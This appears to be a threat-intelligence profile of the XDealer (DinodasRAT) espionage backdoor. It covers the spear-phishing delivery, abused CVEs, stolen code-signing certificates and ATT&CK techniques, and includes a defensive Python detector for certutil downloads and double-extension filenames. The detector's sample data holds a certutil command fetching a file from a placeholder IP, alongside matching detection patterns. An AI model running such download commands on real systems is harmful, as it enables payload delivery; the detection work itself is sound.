XDealer
XDealer is a backdoor/RAT used in cyberespionage operations; TeamT5 named it XDealer, and ESET tracks the same family as DinodasRAT. It has been associated with the China-nexus activity clusters Earth Krahang and LuoYu. In Earth Krahang intrusions, researchers reported that since 2023 the actor shifted from the RESHELL backdoor to XDealer because it provides more comprehensive backdoor capabilities, and they observed both Windows and Linux variants.

XDealer was delivered during the initial stage of attacks via spear-phishing or through web shells on compromised servers. In one documented case, a compromised government mailbox sent a malicious RAR archive containing an LNK file that installed XDealer and displayed a decoy document related to the targeted agency. The broader Earth Krahang campaign targeted government entities worldwide, especially foreign affairs and other ministries, with a concentration in Southeast Asia and additional victims in Europe, the Americas, and Africa. LuoYu has also been reported using XDealer alongside ShadowPad and PlugX.

A notable artifact reported for some XDealer DLL loaders is that they were signed with valid code-signing certificates issued by GlobalSign to the Chinese companies 上海笑聘网络科技有限公司 and 上海指聚网络科技有限公司. Researchers assessed that these certificates were likely stolen and abused, so a valid Authenticode signature from either subject should not by itself be treated as a trust signal.
Groups observed using it
Two distinct threat actors are attributed by public researchers: Earth Krahang and LuoYu.
Since 2023, Earth Krahang shifted to another backdoor (named XDealer by TeamT5 and DinodasRAT by ESET). Compared to RESHELL, XDealer provides more comprehensive backdoor capabilities.
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
6 techniques
Earth Krahang abuses the trust between governments to conduct their attacks. We found that the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses belonging to the same entity.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
We found that some of the XDealer DLL loaders were signed with valid code signing certificates issued by GlobalSign to two Chinese companies.
Since the malicious link uses a legitimate government domain of the compromised server, it will appear less suspicious to targets and may even bypass some domain blacklists.
Initial Access
3 techniques
The threat actor abused the following vulnerabilities multiple times: CVE-2023-32315 (command execution on OpenFire); CVE-2022-21587 (command execution on Oracle Web Applications Desktop Integrator).
Earth Krahang also makes use of spear phishing email to attack its targets... In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Execution
3 techniques
The emails are intended to trick their targets into opening attachments or embedded URL links that ultimately lead to the execution of a prepared backdoor file on the victim's machine.
The malicious attachment was a RAR archive containing an LNK file that deployed the XDealer malware and opened a decoy document.
Persistence
1 technique
Privilege Escalation
1 technique
Stealth
1 technique
Backdoor filenames are usually related to geopolitical topics... 'Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe'
Lateral Movement
1 technique
The actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses belonging to the same entity.
Command and Control
2 techniques
Its binaries are packed with ConfuserEX and its command-and-control (C&C) communication is encrypted with the AES algorithm.
Uses certutil commands to download and install the SoftEther VPN server.
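Two of the procedures above are cheap to catch in process-creation telemetry: the certutil-based download of the SoftEther VPN server (Command and Control) and the double-extension backdoor filenames such as '...Feb 2022.doc.exe' (Stealth). The following Python is an added example written for this page, not code from Trend Micro, TeamT5 or Mallory; the events it scans are constructed, the 203.0.113.10 address is a documentation-range placeholder, and the rule names and extension lists are the author's own choices rather than anything the reports specify.

```python
import ntpath
import re

# Constructed process-creation events for demonstration only; not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "alice",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/vpnserver.zip C:\Users\Public\vpnserver.zip"},
    {"host": "ws01", "user": "alice",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -dump C:\Users\alice\Desktop\cert.cer"},   # benign local use
    {"host": "ws02", "user": "bob",
     "image": r"C:\Users\bob\Downloads\Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe",
     "cmdline": r'"C:\Users\bob\Downloads\Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe"'},
    {"host": "ws02", "user": "bob",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n C:\Users\bob\Desktop\report.docx'},
]

# Extensions that Windows will execute, and extensions a user expects to be documents/images.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta"}
DOC_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx", ".txt", ".rtf", ".jpg", ".png"}

# certutil switches that make it fetch from a URL; both '-' and '/' prefixes are accepted by certutil.
CERTUTIL_NET_FLAGS = re.compile(r"(?i)(?:^|\s)[-/](?:urlcache|urlfetch)\b")
URL_RE = re.compile(r"(?i)\bhttps?://\S+")


def is_certutil_download(image, cmdline):
    """True when certutil.exe is run with a URL-fetching switch and a URL argument."""
    if ntpath.basename(image).lower() != "certutil.exe":
        return False
    return bool(CERTUTIL_NET_FLAGS.search(cmdline) and URL_RE.search(cmdline))


def is_double_extension(path):
    """True for 'name.doc.exe'-style masquerading: a document-looking inner extension
    directly before an executable outer extension."""
    root, ext = ntpath.splitext(ntpath.basename(path))
    if ext.lower() not in EXEC_EXTS:
        return False
    _, inner = ntpath.splitext(root)
    return inner.lower() in DOC_EXTS


def scan(events):
    """Run both rules over a list of process-creation events and return findings."""
    findings = []
    for ev in events:
        if is_certutil_download(ev["image"], ev["cmdline"]):
            findings.append({"host": ev["host"], "rule": "certutil_url_download", "evidence": ev["cmdline"]})
        if is_double_extension(ev["image"]):
            findings.append({"host": ev["host"], "rule": "double_extension_executable", "evidence": ev["image"]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['host']}: {f['evidence']}")
```

Both rules are deliberately narrow: the certutil rule requires a URL in the command line so that local certificate operations do not alert, and the filename rule only fires when the inner extension is one a user would expect to open harmlessly, which keeps ordinary installers such as setup.exe out of the results.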
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
3 sources tracked across advisories, community write-ups, and news.
XDealer is a backdoor malware deployed via spear-phishing campaigns by the Earth Krahang APT group. It is used to gain persistent access to victim systems, enabling espionage and further malicious activity.
A backdoor more feature-rich than RESHELL, used on both Windows and Linux. Early packages included an installer, the XDealer DLL, a stealer module DLL, an ID file, and an LNK/loader. The stealer module can take screenshots, steal clipboard data, and log keystrokes.
Reported at JSAC2021 as malware newly used by LuoYu; that source gives no further technical detail.